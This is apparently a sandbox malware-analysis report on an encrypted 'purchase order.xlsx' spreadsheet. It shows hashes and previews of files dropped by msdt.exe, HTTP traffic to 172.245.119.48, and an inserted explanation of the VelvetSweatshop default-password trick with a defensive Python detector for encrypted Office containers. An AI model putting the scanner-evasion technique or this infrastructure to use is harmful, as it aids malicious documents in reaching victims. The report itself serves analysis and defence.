                                                                                                                                                                                            Entropy (8bit):4.860026903688885
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:384:3FptgXhu9IOM7BTDLwU7GHf7FajKFzB9Ww:Ghu9I9dQYWB9Ww
                                                                                                                                                                                            MD5:2C245DE268793272C235165679BF2A22
                                                                                                                                                                                            SHA1:5F31F80468F992B84E491C9AC752F7AC286E3175
                                                                                                                                                                                            SHA-256:4A6E9F400C72ABC5B00D8B67EA36C06E3BC43BA9468FE748AEBD704947BA66A0
                                                                                                                                                                                            SHA-512:AAECB935C9B4C27021977F211441FF76C71BA9740035EC439E9477AE707109CA5247EA776E2E65159DCC500B0B4324F3733E1DFB05CEF10A39BB11776F74F03C
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:# Copyright . 2008, Microsoft Corporation. All rights reserved.......#TS_ProgramCompatibilityWizard..#rparsons - 05 May 2008....$ShortcutListing = New-Object System.Collections.Hashtable..$ExeListing = New-Object System.Collections.ArrayList..$CombinedListing = New-Object System.Collections.ArrayList....Import-LocalizedData -BindingVariable CompatibilityStrings -FileName CL_LocalizationData....# Block PCW on unsupported SKUs..$BlockedSKUs = @(178)..[Int32]$OSSKU = (Get-WmiObject -Class "Win32_OperatingSystem").OperatingSystemSKU..if ($BlockedSKUs.Contains($OSSKU))..{.. return..}....$typeDefinition = @"....using System;..using System.IO;..using System.Runtime.InteropServices;..using System.Text;..using System.Collections;....public class Utility..{.. public static string GetStartMenuPath().. {.. return Environment.GetFolderPath(Environment.SpecialFolder.StartMenu);.. }.... public static string GetAllUsersStartMenuPath().. {.. return Path.Combine(Environ
                                                                                                                                                                                            Process:C:\Windows\SysWOW64\msdt.exe
                                                                                                                                                                                            File Type:ISO-8859 text, with CRLF line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):453
                                                                                                                                                                                            Entropy (8bit):4.983419443697541
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:12:QcM3BFN+dxmVdyKVCkLZI4S2xhzoJNIDER5lI02xzS4svc3uVr:Qb3DQbeCklTxhzoJUoS02tCr
                                                                                                                                                                                            MD5:60A20CE28D05E3F9703899DF58F17C07
                                                                                                                                                                                            SHA1:98630ABC4B46C3F9BD6AF6F1D0736F2B82551CA9
                                                                                                                                                                                            SHA-256:B71BC60C5707337F4D4B42BA2B3D7BCD2BA46399D361E948B9C2E8BC15636DA2
                                                                                                                                                                                            SHA-512:2B2331B2DD28FB0BBF95DC8C6CA7E40AA56D4416C269E8F1765F14585A6B5722C689BCEBA9699DFD7D97903EF56A7A535E88EAE01DFCC493CEABB69856FFF9AA
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:# Copyright . 2008, Microsoft Corporation. All rights reserved.......#if this environment variable is set, we say that we don't detect the problem anymore so it will..#show as fixed in the final screen..PARAM($appName)....$detected = $true..if ($Env:AppFixed -eq $true)..{.. $detected = $false ..}....Update-DiagRootCause -id "RC_IncompatibleApplication" -iid $appName -Detected $detected....#RS_ProgramCompatibilityWizard..#rparsons - 05 May 2008....
                                                                                                                                                                                            Process:C:\Windows\SysWOW64\msdt.exe
                                                                                                                                                                                            File Type:Little-endian UTF-16 Unicode text, with CRLF, CR line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):6650
                                                                                                                                                                                            Entropy (8bit):3.6751460885012333
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:96:q39pB3hpieJGhn8n/y7+aqwcQoXQZWx+cWUcYpy7I6D1RUh5EEjQB5dm:q39pRhp6Sy6wZifVEtjjFm
                                                                                                                                                                                            MD5:E877AD0545EB0ABA64ED80B576BB67F6
                                                                                                                                                                                            SHA1:4D200348AD4CA28B5EFED544D38F4EC35BFB1204
                                                                                                                                                                                            SHA-256:8CAC8E1DA28E288BF9DB07B2A5BDE294122C8D2A95EA460C757AE5BAA2A05F27
                                                                                                                                                                                            SHA-512:6055EC9A2306D9AA2F522495F736FBF4C3EB4078AD1F56A6224FF42EF525C54FF645337D2525C27F3192332FF56DDD5657C1384846678B343B2BFA68BD478A70
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:..#. .L.o.c.a.l.i.z.e.d...0.4./.1.1./.2.0.1.8. .0.2.:.0.5. .P.M. .(.G.M.T.)...3.0.3.:.4...8.0...0.4.1.1. ...C.L._.L.o.c.a.l.i.z.a.t.i.o.n.D.a.t.a...p.s.d.1.....#. .L.o.c.a.l.i.z.e.d...0.1./.0.4./.2.0.1.3. .1.1.:.3.2. .A.M. .(.G.M.T.)...3.0.3.:.4...8.0...0.4.1.1. ...C.L._.L.o.c.a.l.i.z.a.t.i.o.n.D.a.t.a...p.s.d.1.....C.o.n.v.e.r.t.F.r.o.m.-.S.t.r.i.n.g.D.a.t.a. .@.'.....#.#.#.P.S.L.O.C.....P.r.o.g.r.a.m._.C.h.o.i.c.e._.N.O.T.L.I.S.T.E.D.=.N.o.t. .L.i.s.t.e.d.....V.e.r.s.i.o.n._.C.h.o.i.c.e._.D.E.F.A.U.L.T.=.N.o.n.e.....V.e.r.s.i.o.n._.C.h.o.i.c.e._.W.I.N.8.R.T.M.=.W.i.n.d.o.w.s. .8.....V.e.r.s.i.o.n._.C.h.o.i.c.e._.W.I.N.7.R.T.M.=.W.i.n.d.o.w.s. .7.....V.e.r.s.i.o.n._.C.h.o.i.c.e._.W.I.N.V.I.S.T.A.2.=.W.i.n.d.o.w.s. .V.i.s.t.a. .(.S.e.r.v.i.c.e. .P.a.c.k. .2.).....V.e.r.s.i.o.n._.C.h.o.i.c.e._.W.I.N.X.P.S.P.3.=.W.i.n.d.o.w.s. .X.P. .(.S.e.r.v.i.c.e. .P.a.c.k. .3.).....V.e.r.s.i.o.n._.C.h.o.i.c.e._.M.S.I.A.U.T.O.=.S.k.i.p. .V.e.r.s.i.o.n. .C.h.e.c.k.....V.e.r.s.i.o.n._.C.h.o.i.c.e._.U.N.
                                                                                                                                                                                            Process:C:\Windows\SysWOW64\msdt.exe
                                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):10752
                                                                                                                                                                                            Entropy (8bit):3.517898352371806
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:96:Gmw56QoV8m7t/C7eGu7tCuKFtrHQcoC1dIO4Pktmg5CuxbEWgdv0WwF:WAQovu548tmirAWu8Wm
                                                                                                                                                                                            MD5:CC3C335D4BBA3D39E46A555473DBF0B8
                                                                                                                                                                                            SHA1:92ADCDF1210D0115DB93D6385CFD109301DEAA96
                                                                                                                                                                                            SHA-256:330A1D9ADF3C0D651BDD4C0B272BF2C7F33A5AF012DEEE8D389855D557C4D5FD
                                                                                                                                                                                            SHA-512:49CBF166122D13EEEA2BF2E5F557AA8696B859AEA7F79162463982BBF43499D98821C3C2664807EDED0A250D9176955FB5B1B39A79CDF9C793431020B682ED12
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                            • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........<...R...R...R.......R...P...R.Rich..R.................PE..L..................!.........(...............................................P...........@.......................................... ...$..............................8............................................................................rdata..............................@..@.rsrc....0... ...&..................@..@......E.........T...8...8.........E.........$...................8....rdata..8...x....rdata$zzzdbg.... .......rsrc$01.....#..0!...rsrc$02.... .......OV....,.+.(,..vA..@..E.........................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                            Process:C:\Windows\SysWOW64\msdt.exe
                                                                                                                                                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):48956
                                                                                                                                                                                            Entropy (8bit):5.103589775370961
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:768:hUeTHmb0+tk+Ci10ycNV6OW9a+KDoVxrVF+bBH0t9mYNJ7u2+d:hUcHXDY10tNV6OW9abDoVxrVF+bBH0tO
                                                                                                                                                                                            MD5:310E1DA2344BA6CA96666FB639840EA9
                                                                                                                                                                                            SHA1:E8694EDF9EE68782AA1DE05470B884CC1A0E1DED
                                                                                                                                                                                            SHA-256:67401342192BABC27E62D4C1E0940409CC3F2BD28F77399E71D245EAE8D3F63C
                                                                                                                                                                                            SHA-512:62AB361FFEA1F0B6FF1CC76C74B8E20C2499D72F3EB0C010D47DBA7E6D723F9948DBA3397EA26241A1A995CFFCE2A68CD0AAA1BB8D917DD8F4C8F3729FA6D244
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:<?xml version="1.0"?>..<?Copyright (c) Microsoft Corporation. All rights reserved.?>..<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:ms="urn:microsoft-performance" exclude-result-prefixes="msxsl" version="1.0">...<xsl:output method="html" indent="yes" standalone="yes" encoding="UTF-16"/>...<xsl:template name="localization">....<_locDefinition>.....<_locDefault _loc="locNone"/>.....<_locTag _loc="locData">String</_locTag>.....<_locTag _loc="locData">Font</_locTag>.....<_locTag _loc="locData">Mirror</_locTag>....</_locDefinition>...</xsl:template>... ********** Images ********** -->...<xsl:variable name="images">....<Image id="check">res://sdiageng.dll/check.png</Image>....<Image id="error">res://sdiageng.dll/error.png</Image>....<Image id="info">res://sdiageng.dll/info.png</Image>....<Image id="warning">res://sdiageng.dll/warning.png</Image>....<Image id="expand">res://sdiageng.dll/expand.png</Image>....<Image id="
File type: CDFV2 Encrypted
Entropy (8bit): 7.868306503118196
TrID:
• Generic OLE2 / Multistream Compound File (8008/1) 100.00%
File name: purchase order.xlsx
File size: 72696
MD5: a8930c1fcd80e9965ae26446afb717f6
SHA1: 0cbf04bf7fc8522ab983f0246357fa70a85ee56b
SHA256: c02ff7b4d28a259d37a659a6951dba4ee574562ef5fc3b3a0135640c0370dee2
SHA512: ead35c97bfccb344ed5837e82e1f648e518c52a1c6c67bd6511e018b4dc2d1364ae1f6b7ddad69f02e58aa417402327ac3e36f175220c2c6f72fc01d4758b77f
SSDEEP: 1536:eZfD+2fBiNR+vgt1ru46raHpu8KBZo5ujmBonFLT1J:eZyVhTWupIrocjmBoFz
TLSH: 2C63D08237AB691BCC12093CD51142471E780F5869A8697BACC9B30F487D7CFED53AAD
File Content Preview: ........................>......................................................................................................................................................................................................................................
Icon Hash: 74ecd0d2d6d6d0dc
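The static information above reports the sample as CDFV2 Encrypted with an entropy close to 8 bits per byte: the OLE2 container wraps an Office-encrypted package, so a content scanner that does not decrypt the file sees only ciphertext (Excel opens such a file without any prompt when it was encrypted with the default password VelvetSweatshop). The following is an added example, not code from this report or from Joe Sandbox, that walks the OLE2 directory with the standard library only and flags the EncryptionInfo/EncryptedPackage stream pair that identifies an encrypted container. The compound file it runs against is constructed inline and is not the sample on this page; the function names and the stream-name constants are the example's own.

```python
import struct

# Compound File Binary (OLE2 / "CDFV2") constants, per [MS-CFB]
OLE_MAGIC = b"\xD0\xCF\x11\xE0\xA1\xB1\x1A\xE1"
ENDOFCHAIN = 0xFFFFFFFE
FATSECT = 0xFFFFFFFD
FREESECT = 0xFFFFFFFF        # also NOSTREAM in directory sibling pointers
STGTY_STREAM, STGTY_ROOT = 2, 5

# Streams that make up an Office-encrypted container: the OOXML payload sits as
# ciphertext in EncryptedPackage, which is why content signatures see only entropy.
ENCRYPTED_STREAMS = {"EncryptionInfo", "EncryptedPackage"}


def _sector(data, sector_size, idx):
    """Sector `idx`; sector 0 starts right after the 512-byte header."""
    return data[(idx + 1) * sector_size:(idx + 2) * sector_size]


def _fat(data, sector_size):
    """Rebuild the FAT from the header DIFAT (109 entries, enough for files below ~7 MB)."""
    fat = []
    for fat_sect in struct.unpack("<109I", data[76:512]):
        if fat_sect == FREESECT:
            break
        fat.extend(struct.unpack("<%dI" % (sector_size // 4), _sector(data, sector_size, fat_sect)))
    return fat


def ole_directory_names(data):
    """Return (name, type) for every used directory entry, following the directory chain."""
    if data[:8] != OLE_MAGIC:
        raise ValueError("not an OLE2 compound file")
    sector_size = 1 << struct.unpack("<H", data[30:32])[0]
    sect = struct.unpack("<I", data[48:52])[0]      # first directory sector
    fat = _fat(data, sector_size)
    names, seen = [], set()
    while sect < len(fat) and sect not in seen:      # `seen` defeats a looped FAT chain
        seen.add(sect)
        chunk = _sector(data, sector_size, sect)
        for off in range(0, len(chunk), 128):
            entry = chunk[off:off + 128]
            name_len, entry_type = struct.unpack("<HB", entry[64:67])
            if entry_type == 0 or name_len < 2:      # unused entry
                continue
            names.append((entry[:name_len - 2].decode("utf-16-le"), entry_type))
        sect = fat[sect]
    return names


def is_encrypted_office_container(data):
    """True when both streams of an Office-encrypted (CDFV2 Encrypted) container are present."""
    streams = {name for name, kind in ole_directory_names(data) if kind == STGTY_STREAM}
    return ENCRYPTED_STREAMS <= streams


def _dir_entry(name, entry_type, child=FREESECT, right=FREESECT):
    """One 128-byte directory entry with an empty stream (constructed test data only)."""
    raw = name.encode("utf-16-le") + b"\x00\x00"
    return (raw.ljust(64, b"\x00")
            + struct.pack("<HBB", len(raw), entry_type, 1)     # name length, type, colour=black
            + struct.pack("<III", FREESECT, right, child)      # left sibling, right sibling, child
            + b"\x00" * 36                                     # CLSID, state bits, timestamps
            + struct.pack("<IQ", ENDOFCHAIN, 0))               # start sector, stream size


def build_sample_ole(stream_names=("EncryptionInfo", "EncryptedPackage")):
    """Constructed minimal compound file (v3, 512-byte sectors): one FAT sector and one
    directory sector holding the root entry plus up to three empty streams."""
    if len(stream_names) > 3:
        raise ValueError("the single directory sector holds at most three streams")
    header = (OLE_MAGIC + b"\x00" * 16
              + struct.pack("<HHH", 0x3E, 3, 0xFFFE)              # minor/major version, byte order
              + struct.pack("<HH", 9, 6) + b"\x00" * 6            # 512-byte sectors, 64-byte mini sectors
              + struct.pack("<III", 0, 1, 1)                      # dir sector count (v3: 0), FAT sectors, first dir sector
              + struct.pack("<II", 0, 4096)                       # transaction signature, mini-stream cutoff
              + struct.pack("<IIII", ENDOFCHAIN, 0, ENDOFCHAIN, 0)  # no mini FAT, no extra DIFAT
              + struct.pack("<109I", 0, *([FREESECT] * 108)))     # DIFAT: the FAT lives in sector 0
    fat = struct.pack("<128I", FATSECT, ENDOFCHAIN, *([FREESECT] * 126))
    entries = [_dir_entry("Root Entry", STGTY_ROOT, child=1)]
    for i, name in enumerate(stream_names):
        nxt = i + 2 if i + 1 < len(stream_names) else FREESECT
        entries.append(_dir_entry(name, STGTY_STREAM, right=nxt))
    return header + fat + b"".join(entries).ljust(512, b"\x00")


if __name__ == "__main__":
    sample = build_sample_ole()
    print(ole_directory_names(sample))
    print("encrypted container:", is_encrypted_office_container(sample))
```

On a real file, read it as bytes and pass it to `is_encrypted_office_container`; a hit means the hashes and entropy above describe the wrapper, not the workbook, and the inner OOXML package must be decrypted (with the default password if the author relied on it) before relationships and embedded content can be inspected.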
Timestamp                             Source Port  Dest Port  Source IP        Dest IP
Jun 28, 2022 10:45:23.336363077 CEST  49773        80         192.168.2.4      172.245.119.48
Jun 28, 2022 10:45:23.451755047 CEST  80           49773      172.245.119.48   192.168.2.4
Jun 28, 2022 10:45:23.451863050 CEST  49773        80         192.168.2.4      172.245.119.48
Jun 28, 2022 10:45:23.452174902 CEST  49773        80         192.168.2.4      172.245.119.48
Jun 28, 2022 10:45:23.572532892 CEST  80           49773      172.245.119.48   192.168.2.4
Jun 28, 2022 10:45:23.572566032 CEST  80           49773      172.245.119.48   192.168.2.4
Jun 28, 2022 10:45:23.572590113 CEST  80           49773      172.245.119.48   192.168.2.4
Jun 28, 2022 10:45:23.572613955 CEST  80           49773      172.245.119.48   192.168.2.4
Jun 28, 2022 10:45:23.572635889 CEST  80           49773      172.245.119.48   192.168.2.4
Jun 28, 2022 10:45:23.572658062 CEST  80           49773      172.245.119.48   192.168.2.4
Jun 28, 2022 10:45:23.572679996 CEST  80           49773      172.245.119.48   192.168.2.4
Jun 28, 2022 10:45:23.572694063 CEST  49773        80         192.168.2.4      172.245.119.48
Jun 28, 2022 10:45:23.572701931 CEST  80           49773      172.245.119.48   192.168.2.4
Jun 28, 2022 10:45:23.572726965 CEST  80           49773      172.245.119.48   192.168.2.4
Jun 28, 2022 10:45:23.572750092 CEST  49773        80         192.168.2.4      172.245.119.48
Jun 28, 2022 10:45:23.572783947 CEST  49773        80         192.168.2.4      172.245.119.48
Jun 28, 2022 10:45:23.574032068 CEST  80           49773      172.245.119.48   192.168.2.4
Jun 28, 2022 10:45:23.574116945 CEST  49773        80         192.168.2.4      172.245.119.48
Jun 28, 2022 10:45:23.689332962 CEST  80           49773      172.245.119.48   192.168.2.4
Jun 28, 2022 10:45:23.689361095 CEST  80           49773      172.245.119.48   192.168.2.4
Jun 28, 2022 10:45:23.689382076 CEST  80           49773      172.245.119.48   192.168.2.4
Jun 28, 2022 10:45:23.689399004 CEST  80           49773      172.245.119.48   192.168.2.4
Jun 28, 2022 10:45:23.689419985 CEST  80           49773      172.245.119.48   192.168.2.4
Jun 28, 2022 10:45:23.689430952 CEST  49773        80         192.168.2.4      172.245.119.48
Jun 28, 2022 10:45:23.689441919 CEST  80           49773      172.245.119.48   192.168.2.4
Jun 28, 2022 10:45:23.689459085 CEST  80           49773      172.245.119.48   192.168.2.4
Jun 28, 2022 10:45:23.689480066 CEST  49773        80         192.168.2.4      172.245.119.48
Jun 28, 2022 10:45:23.689503908 CEST  49773        80         192.168.2.4      172.245.119.48
Jun 28, 2022 10:45:29.079606056 CEST  80           49773      172.245.119.48   192.168.2.4
Jun 28, 2022 10:45:29.079698086 CEST  49773        80         192.168.2.4      172.245.119.48
Jun 28, 2022 10:46:19.438086033 CEST  49773        80         192.168.2.4      172.245.119.48
Jun 28, 2022 10:46:19.556322098 CEST  80           49773      172.245.119.48   192.168.2.4
Jun 28, 2022 10:46:37.520191908 CEST  49783        80         192.168.2.4      172.245.119.48
Jun 28, 2022 10:46:37.635241032 CEST  80           49783      172.245.119.48   192.168.2.4
Jun 28, 2022 10:46:37.635344028 CEST  49783        80         192.168.2.4      172.245.119.48
Jun 28, 2022 10:46:37.635595083 CEST  49783        80         192.168.2.4      172.245.119.48
Jun 28, 2022 10:46:37.757875919 CEST  80           49783      172.245.119.48   192.168.2.4
Jun 28, 2022 10:46:37.757917881 CEST  80           49783      172.245.119.48   192.168.2.4
Jun 28, 2022 10:46:37.757942915 CEST  80           49783      172.245.119.48   192.168.2.4
Jun 28, 2022 10:46:37.757967949 CEST  80           49783      172.245.119.48   192.168.2.4
Jun 28, 2022 10:46:37.757992029 CEST  80           49783      172.245.119.48   192.168.2.4
Jun 28, 2022 10:46:37.758012056 CEST  49783        80         192.168.2.4      172.245.119.48
Jun 28, 2022 10:46:37.758013964 CEST  80           49783      172.245.119.48   192.168.2.4
Jun 28, 2022 10:46:37.758039951 CEST  80           49783      172.245.119.48   192.168.2.4
Jun 28, 2022 10:46:37.758063078 CEST  49783        80         192.168.2.4      172.245.119.48
Jun 28, 2022 10:46:37.758064985 CEST  80           49783      172.245.119.48   192.168.2.4
Jun 28, 2022 10:46:37.758090019 CEST  80           49783      172.245.119.48   192.168.2.4
Jun 28, 2022 10:46:37.758090973 CEST  49783        80         192.168.2.4      172.245.119.48
Jun 28, 2022 10:46:37.758115053 CEST  80           49783      172.245.119.48   192.168.2.4
Jun 28, 2022 10:46:37.758147001 CEST  49783        80         192.168.2.4      172.245.119.48
Jun 28, 2022 10:46:37.758224964 CEST  49783        80         192.168.2.4      172.245.119.48
Jun 28, 2022 10:46:37.874607086 CEST  80           49783      172.245.119.48   192.168.2.4
Jun 28, 2022 10:46:37.874644041 CEST  80           49783      172.245.119.48   192.168.2.4
Jun 28, 2022 10:46:37.874670029 CEST  80           49783      172.245.119.48   192.168.2.4
Jun 28, 2022 10:46:37.874687910 CEST  49783        80         192.168.2.4      172.245.119.48
Jun 28, 2022 10:46:37.874696970 CEST  80           49783      172.245.119.48   192.168.2.4
Jun 28, 2022 10:46:37.874725103 CEST  80           49783      172.245.119.48   192.168.2.4
Jun 28, 2022 10:46:37.874726057 CEST  49783        80         192.168.2.4      172.245.119.48
Jun 28, 2022 10:46:37.874751091 CEST  80           49783      172.245.119.48   192.168.2.4
Jun 28, 2022 10:46:37.874774933 CEST  80           49783      172.245.119.48   192.168.2.4
Jun 28, 2022 10:46:37.874777079 CEST  49783        80         192.168.2.4      172.245.119.48
Jun 28, 2022 10:46:37.874799967 CEST  80           49783      172.245.119.48   192.168.2.4
Jun 28, 2022 10:46:37.874809980 CEST  49783        80         192.168.2.4      172.245.119.48
Jun 28, 2022 10:46:37.874826908 CEST  80           49783      172.245.119.48   192.168.2.4
Jun 28, 2022 10:46:37.874852896 CEST  80           49783      172.245.119.48   192.168.2.4
Jun 28, 2022 10:46:37.874854088 CEST  49783        80         192.168.2.4      172.245.119.48
Jun 28, 2022 10:46:37.874878883 CEST  80           49783      172.245.119.48   192.168.2.4
Jun 28, 2022 10:46:37.874886036 CEST  49783        80         192.168.2.4      172.245.119.48
Jun 28, 2022 10:46:37.874903917 CEST  80           49783      172.245.119.48   192.168.2.4
Jun 28, 2022 10:46:37.874927044 CEST  49783        80         192.168.2.4      172.245.119.48
Jun 28, 2022 10:46:37.874929905 CEST  80           49783      172.245.119.48   192.168.2.4
Jun 28, 2022 10:46:37.874954939 CEST  80           49783      172.245.119.48   192.168.2.4
Jun 28, 2022 10:46:37.874958992 CEST  49783        80         192.168.2.4      172.245.119.48
Jun 28, 2022 10:46:37.874979019 CEST  80           49783      172.245.119.48   192.168.2.4
Jun 28, 2022 10:46:37.874984980 CEST  49783        80         192.168.2.4      172.245.119.48
Jun 28, 2022 10:46:37.875004053 CEST  80           49783      172.245.119.48   192.168.2.4
Jun 28, 2022 10:46:37.875010967 CEST  49783        80         192.168.2.4      172.245.119.48
Jun 28, 2022 10:46:37.875029087 CEST  80           49783      172.245.119.48   192.168.2.4
Jun 28, 2022 10:46:37.875039101 CEST  49783        80         192.168.2.4      172.245.119.48
Jun 28, 2022 10:46:37.875055075 CEST  80           49783      172.245.119.48   192.168.2.4
Jun 28, 2022 10:46:37.875080109 CEST  49783        80         192.168.2.4      172.245.119.48
Jun 28, 2022 10:46:37.875080109 CEST  80           49783      172.245.119.48   192.168.2.4
Jun 28, 2022 10:46:37.875104904 CEST  80           49783      172.245.119.48   192.168.2.4
Jun 28, 2022 10:46:37.875129938 CEST  49783        80         192.168.2.4      172.245.119.48
Jun 28, 2022 10:46:37.875166893 CEST  49783        80         192.168.2.4      172.245.119.48
Jun 28, 2022 10:46:37.990305901 CEST  80           49783      172.245.119.48   192.168.2.4
Jun 28, 2022 10:46:37.990358114 CEST  80           49783      172.245.119.48   192.168.2.4
Jun 28, 2022 10:46:37.990386009 CEST  80           49783      172.245.119.48   192.168.2.4
Jun 28, 2022 10:46:37.990408897 CEST  80           49783      172.245.119.48   192.168.2.4
Jun 28, 2022 10:46:37.990433931 CEST  80           49783      172.245.119.48   192.168.2.4
Jun 28, 2022 10:46:37.990457058 CEST  49783        80         192.168.2.4      172.245.119.48
Jun 28, 2022 10:46:37.990459919 CEST  80           49783      172.245.119.48   192.168.2.4
Jun 28, 2022 10:46:37.990483999 CEST  80           49783      172.245.119.48   192.168.2.4
Jun 28, 2022 10:46:37.990509033 CEST  80           49783      172.245.119.48   192.168.2.4
Jun 28, 2022 10:46:37.990520954 CEST  49783        80         192.168.2.4      172.245.119.48
Jun 28, 2022 10:46:37.990533113 CEST  80           49783      172.245.119.48   192.168.2.4
Jun 28, 2022 10:46:37.990555048 CEST  80           49783      172.245.119.48   192.168.2.4
Jun 28, 2022 10:46:37.990556955 CEST  49783        80         192.168.2.4      172.245.119.48
Jun 28, 2022 10:46:37.990578890 CEST  80           49783      172.245.119.48   192.168.2.4
Jun 28, 2022 10:46:37.990602970 CEST  49783        80         192.168.2.4      172.245.119.48
Jun 28, 2022 10:46:37.990605116 CEST  80           49783      172.245.119.48   192.168.2.4
Jun 28, 2022 10:46:37.990629911 CEST  80           49783      172.245.119.48   192.168.2.4
Jun 28, 2022 10:46:37.990653038 CEST  49783        80         192.168.2.4      172.245.119.48
Jun 28, 2022 10:46:37.990654945 CEST  80           49783      172.245.119.48   192.168.2.4
Jun 28, 2022 10:46:37.990679026 CEST  80           49783      172.245.119.48   192.168.2.4
Jun 28, 2022 10:46:37.990683079 CEST  49783        80         192.168.2.4      172.245.119.48
Jun 28, 2022 10:46:37.990705013 CEST  80           49783      172.245.119.48   192.168.2.4
Jun 28, 2022 10:46:37.990730047 CEST  80           49783      172.245.119.48   192.168.2.4
Jun 28, 2022 10:46:37.990730047 CEST  49783        80         192.168.2.4      172.245.119.48
Jun 28, 2022 10:46:37.990755081 CEST  80           49783      172.245.119.48   192.168.2.4
Jun 28, 2022 10:46:37.990761995 CEST  49783        80         192.168.2.4      172.245.119.48
Jun 28, 2022 10:46:37.990778923 CEST  80           49783      172.245.119.48   192.168.2.4
Jun 28, 2022 10:46:37.990802050 CEST  49783        80         192.168.2.4      172.245.119.48
Jun 28, 2022 10:46:37.990803003 CEST  80           49783      172.245.119.48   192.168.2.4
Jun 28, 2022 10:46:37.990828991 CEST  80           49783      172.245.119.48   192.168.2.4
Jun 28, 2022 10:46:37.990842104 CEST  49783        80         192.168.2.4      172.245.119.48
Jun 28, 2022 10:46:37.990854979 CEST  80           49783      172.245.119.48   192.168.2.4
Jun 28, 2022 10:46:37.990879059 CEST  80           49783      172.245.119.48   192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:37.990880013 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:37.990902901 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:37.990925074 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:37.990926981 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:37.990950108 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:37.990951061 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:37.990976095 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:37.990998030 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:37.990999937 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:37.991024971 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:37.991029978 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:37.991049051 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:37.991071939 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:37.991072893 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:37.991099119 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:37.991100073 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:37.991122961 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:37.991147041 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:37.991147041 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:37.991173029 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:37.991199017 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:37.991199017 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:37.991221905 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:37.991225004 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:37.991250992 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:37.991260052 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:37.991276026 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:37.991300106 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:37.991302967 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:37.991326094 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:37.991363049 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.109687090 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.109730959 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.109751940 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.109757900 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.109771967 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.109788895 CEST4978380192.168.2.4172.245.119.48
